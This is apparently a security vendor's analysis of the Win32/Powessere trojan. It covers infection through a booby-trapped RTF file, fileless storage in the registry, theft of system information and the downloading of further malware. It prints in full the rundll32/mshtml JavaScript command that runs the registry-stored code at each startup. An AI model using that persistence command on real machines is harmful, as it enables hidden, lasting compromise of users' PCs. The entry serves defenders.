Win32/Powessere

Installation

Variants in this family, such as Trojan:Win32/Powessere.A, might be dropped by Exploit:Win32/CVE-2012-0158.CJ. That exploit tricks you into opening a fake Word document (.rtf file) that will infect you with this threat.

The threat is a piece of JavaScript and PowerShell code that is encoded with multiple layers of PowerShell and base64 encoding.

It stores the code in the registry entry HKCU\software\microsoft\windows\currentversion\run\"(default)".

The threat then creates the following registry entry that refers to the code so that it runs each time you start your PC. The name it uses is non-ASCII, which means it might look like random icons or nothing at all, as in the screenshot below:

In subkey: HKCU\software\microsoft\windows\currentversion\run\
Sets value: "<non-ASCII name>"
With data: "rundll32.exe javascript:"\..\mshtml,runhtmlapplication ";document.write ("\74script language=jscript.encode>"+(new%20activexobject("wscript.shell")).regread("hkcu\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>")

Because it creates and uses these registry entries, it means the threat can stay completely in the registry - unlike other malware that resides in the file system as a file.

The malware which drops Win32/Powessere also checks if your PC has PowerShell installed. If it isn't installed, the malware dropper tries to download and install PowerShell.

Payload

Steals information about your PC

The threat can steal information about your PC, including:

• Universal Unique Identifier (UUID)
• Operating system version
• System architecture (64-bit or 32-bit version of Windows) 

It sends this information to a remote malicious hacker using a POST command. It has two IP addresses embedded in its body that it uses for this purpose.

The stolen information is sent with the threat's build date version and a flag (for example, "start", "exist", "low", "install") indicating whether the malware is new on your PC, or if it has been installed before. The following code screenshot shows the flags it sets:

Downloads other malware

This malware can download other malware onto your PC. It might also install a backdoor that it can then use to steal more sensitive information.  

Related information 

Social Engineering Advice - Microsoft Security Intelligence Report featured article 

Analysis by Karthik Selvaraj and Teoderick Contreras